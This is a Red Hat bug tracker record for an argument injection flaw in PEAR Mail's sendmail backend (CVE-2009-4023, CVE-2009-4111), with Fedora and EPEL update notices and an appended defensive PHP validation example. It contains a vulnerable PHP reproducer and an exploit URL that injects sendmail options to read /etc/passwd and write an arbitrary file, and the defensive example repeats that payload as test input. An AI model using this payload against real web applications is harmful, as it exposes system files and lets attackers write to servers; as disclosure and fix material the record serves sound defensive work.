Bug 540842 (CVE-2009-4023, CVE-2009-4111)
Summary: | CVE-2009-4023 CVE-2009-4111 php-pear-Mail: Absent sanitization of mail header fields | |
---|---|---|---
Product: | [Other] Security Response | Reporter: | Jan Lieskovsky <jlieskov>
Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team>
Status: | CLOSED ERRATA | QA Contact: |
Severity: | high | Docs Contact: |
Priority: | high | |
Version: | unspecified | CC: | fedora, mjc
Target Milestone: | --- | Keywords: | Security
Target Release: | --- | |
Hardware: | All | |
OS: | Linux | |
URL: | http://pear.php.net/bugs/bug.php?id=16200 | |
Whiteboard: | | |
Fixed In Version: | | Doc Type: | Bug Fix
Doc Text: | | Story Points: | ---
Clone Of: | | Environment: |
Last Closed: | 2010-12-21 22:04:57 UTC | Type: | ---
Regression: | --- | Mount Type: | ---
Documentation: | --- | CRM: |
Verified Versions: | | Category: | ---
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: |
Cloudforms Team: | --- | Target Upstream Version: |
Embargoed: | | |
Bug Depends On: | 541964 | |
Bug Blocks: | | |
Description
Jan Lieskovsky
2009-11-24 10:37:59 UTC
Reproducer:
-----------

```php
<?php
ini_set('include_path', ini_get('include_path') . ':/usr/local/lib/php/PEAR:');
require_once("Mail.php");
// The email field is taken straight from the request and placed in the From header unchecked.
$from = "From: " . $_REQUEST['email'] . "\r\n";
$to = "xxxxxxx";
$subj = "subscription request";
$body = "subscribe me";
$cc = "";  // not defined in the original reproducer; set here so the header array is well-formed
$bcc = "";
$hdrs = array(
    "To" => $to,
    "Cc" => $cc,
    "Bcc" => $bcc,
    "From" => $from,
    "Subject" => $subj,
);
$body = "test";
$mail =& Mail::factory('sendmail');
$mail->send($to, $hdrs, $body);
?>
```

test.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3

Note: You might need to change the path to ':/usr/share/pear/:'.

After this I can view the content of my /etc/passwd with some add-ons as /tmp/wokao.

This issue affects the versions of the php-pear-Mail package as shipped with Fedora releases 10, 11 and 12, and as shipped with the Extra Packages for Enterprise Linux 5 (EPEL-5) project.

Please fix.

This is CVE-2009-4023.

php-pear-Mail-1.1.14-5.el5.1 has been submitted as an update for Fedora EPEL 5.
http://admin.fedoraproject.org/updates/php-pear-Mail-1.1.14-5.el5.1

Common Vulnerabilities and Exposures assigned a separate identifier of CVE-2009-4111 for the missing sanitization of the $recipients header of php-pear-Mail:

Argument injection vulnerability in Mail/sendmail.php in the Mail package 1.1.14, 1.2.0b2, and possibly other versions for PEAR allows remote attackers to read and write arbitrary files via a crafted $recipients parameter, and possibly other parameters, a different vulnerability than CVE-2009-4023.

References:
-----------
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4111
http://www.openwall.com/lists/oss-security/2009/11/23/8
http://www.openwall.com/lists/oss-security/2009/11/28/2
http://pear.php.net/bugs/bug.php?id=16200
https://bugs.gentoo.org/show_bug.cgi?id=294256

php-pear-Mail-1.1.14-5.fc11 has been pushed to the Fedora 11 stable repository. If problems still persist, please make note of it in this bug report.

php-pear-Mail-1.1.14-5.fc12 has been pushed to the Fedora 12 stable repository. If problems still persist, please make note of it in this bug report.

php-pear-Mail-1.1.14-5.fc10 has been pushed to the Fedora 10 stable repository. If problems still persist, please make note of it in this bug report.

php-pear-Mail-1.1.14-5.el5.1 has been pushed to the Fedora EPEL 5 stable repository. If problems still persist, please make note of it in this bug report.
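The check a caller of a sendmail-backed Mail::send() needs against the argument injection described above, as an added example that is not PEAR Mail's own code nor its upstream fix: addresses and header values are validated before they can reach the command line, and the recipient list is shell-quoted. The function names isSafeAddress, isSafeHeaderValue and buildRecipientArgs are hypothetical, and the inputs are constructed.

```php
<?php
// Added example, not PEAR Mail's own code: reject addresses that a
// sendmail-style backend would split into extra command-line arguments,
// and shell-quote whatever is passed on. Function names are hypothetical.

// One command-line token only: no whitespace or control characters (the
// reproducer's tabs), no leading '-' (read as an option), valid mailbox syntax.
function isSafeAddress(string $addr): bool
{
    if ($addr === '' || $addr[0] === '-') {
        return false;
    }
    if (preg_match('/[\s\x00-\x1f\x7f]/', $addr)) {
        return false;
    }
    return filter_var($addr, FILTER_VALIDATE_EMAIL) !== false;
}

// Header values (From, To, Cc, ...) must not carry CR, LF or NUL: a bare
// line break lets a caller append further headers.
function isSafeHeaderValue(string $value): bool
{
    return preg_match('/[\r\n\x00]/', $value) === 0;
}

// Build the recipient part of a sendmail command line: validate each
// address, then quote it; one bad address aborts the whole call.
function buildRecipientArgs(array $recipients): string
{
    $args = [];
    foreach ($recipients as $rcpt) {
        if (!isSafeAddress($rcpt)) {
            throw new InvalidArgumentException('Unsafe recipient (hex): ' . bin2hex($rcpt));
        }
        $args[] = escapeshellarg($rcpt);
    }
    return implode(' ', $args);
}
// Constructed inputs: a normal address and the tab-separated shape of the
// reproducer's email parameter, which the check must reject.
$good = 'user@example.com';
$bad  = "xxxxx\t-C\t/etc/passwd\t-X\t/tmp/wokao\tzzz@x\t.com";
var_dump(isSafeAddress($good));                 // plain address
var_dump(isSafeAddress($bad));                  // tab-separated injection shape
var_dump(isSafeHeaderValue("From: $good\r\n")); // header value with a trailing CRLF
try {
    echo buildRecipientArgs([$good, $bad]), "\n"; // throws on $bad
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```

Validation is done on the raw string before any trimming, so the tab characters the reproducer relies on are caught rather than stripped.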